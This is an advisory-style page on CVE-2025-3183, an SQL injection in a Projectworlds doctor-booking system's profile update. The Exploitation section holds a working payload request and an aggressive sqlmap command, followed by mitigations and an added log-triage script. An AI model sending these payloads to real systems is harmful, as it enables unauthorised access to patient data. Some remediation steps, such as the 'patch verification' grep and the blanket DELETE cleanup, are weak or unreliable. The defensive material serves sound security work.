How CVE-2025-3183 Works
The vulnerability exists in `/patient/patientupdateprofile.php` of Projectworlds Online Doctor Appointment Booking System 1.0 due to improper input sanitization of the `patientFirstName` parameter. An attacker can inject malicious SQL queries via this parameter, manipulating database operations. Since the application fails to use prepared statements or proper escaping, the injected SQL executes in the backend database, potentially allowing unauthorized data access, modification, or deletion. The flaw is remotely exploitable without authentication, making it critical.
DailyCVE Form
Platform: Projectworlds Online Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025
What Undercode Says:
Exploitation
1. Manual Exploit:
POST /patient/patientupdateprofile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

patientFirstName=' OR 1=1-- -
2. SQLMap Automation:
sqlmap -u "http://target.com/patient/patientupdateprofile.php" --data="patientFirstName=test" --risk=3 --level=5 --dbms=mysql
Protection
1. Input Sanitization:
$patientFirstName = mysqli_real_escape_string($conn, $_POST['patientFirstName']);
2. Prepared Statements:
$stmt = $conn->prepare("UPDATE patients SET firstName=? WHERE id=?");
$stmt->bind_param("si", $_POST['patientFirstName'], $patientId);
$stmt->execute();
3. WAF Rules:
location ~ \.php$ {
    modsecurity on;
    modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:1001,phase:2,deny,status:403"';
}
(The dot in the location pattern must be escaped, and ModSecurity rejects a rule without an id and phase; 1001 is an arbitrary local rule id.)
4. Patch Verification:
grep -r "patientupdateprofile.php" /var/www/html/
5. Log Monitoring:
tail -f /var/log/apache2/access.log | grep -i "patientupdateprofile.php"
6. Database Permissions:
REVOKE ALL PRIVILEGES ON booking_db.* FROM 'app_user'@'localhost';
GRANT SELECT, UPDATE ON booking_db.patients TO 'app_user'@'localhost';
7. Exploit Detection:
grep -i "sql syntax" /var/log/apache2/error.log
8. Backup for Restoration:
mysqldump -u root -p booking_db > backup.sql
9. Vendor Patch:
wget https://projectworlds.com/patches/1.0.1.zip
unzip 1.0.1.zip -d /var/www/html/
10. Post-Exploit Cleanup:
DELETE FROM patients WHERE firstName LIKE '%--%';
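Steps 5 and 7 above grep the logs by hand. The following Python script, added here as an example and not part of the original advisory or the vendor's code, does the same triage over Apache combined-format access log lines: it groups requests to the vulnerable endpoint by client IP and flags bursts of POSTs, 5xx responses and the default sqlmap User-Agent. The log lines are constructed, and the threshold of 20 POSTs is an assumed tuning value.

```python
import re
from collections import defaultdict

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TARGET = "/patient/patientupdateprofile.php"  # endpoint named in the advisory
POST_THRESHOLD = 20  # assumed: a real user edits a profile a few times, not dozens

def parse_line(line):
    # Return the fields of one combined-format line, or None if it does not parse.
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def flag_suspicious(lines, post_threshold=POST_THRESHOLD):
    # Group requests to TARGET by client IP and return {ip: [reasons]} for outliers.
    stats = defaultdict(lambda: {"posts": 0, "errors": 0, "scanner_ua": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"].split("?", 1)[0] != TARGET:
            continue  # unparsable line or a different endpoint
        s = stats[rec["ip"]]
        if rec["method"] == "POST":
            s["posts"] += 1
        if rec["status"].startswith("5"):  # broken SQL usually surfaces as a 500
            s["errors"] += 1
        if "sqlmap" in rec["ua"].lower():  # default User-Agent of the tool named above
            s["scanner_ua"] = True
    flagged = {}
    for ip, s in stats.items():
        reasons = []
        if s["posts"] >= post_threshold:
            reasons.append(f"{s['posts']} POST request(s) to endpoint")
        if s["errors"]:
            reasons.append(f"{s['errors']} 5xx response(s)")
        if s["scanner_ua"]:
            reasons.append("sqlmap User-Agent")
        if reasons:
            flagged[ip] = reasons
    return flagged

# Constructed sample log (not from a real server): one normal edit, one unrelated
# hit, and a burst of 25 POSTs from a scanner with intermittent 500s.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Apr/2025:10:00:01 +0000] "POST /patient/patientupdateprofile.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Apr/2025:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "curl/8.0"',
] + [
    f'203.0.113.7 - - [15/Apr/2025:10:01:{i:02d} +0000] "POST /patient/patientupdateprofile.php HTTP/1.1" '
    f'{500 if i % 4 == 0 else 200} 0 "-" "sqlmap/1.8"' for i in range(25)
]
```

Running `flag_suspicious(SAMPLE_LOG)` reports only 203.0.113.7, with all three reasons; the single legitimate edit from 10.0.0.5 stays below the threshold.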
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode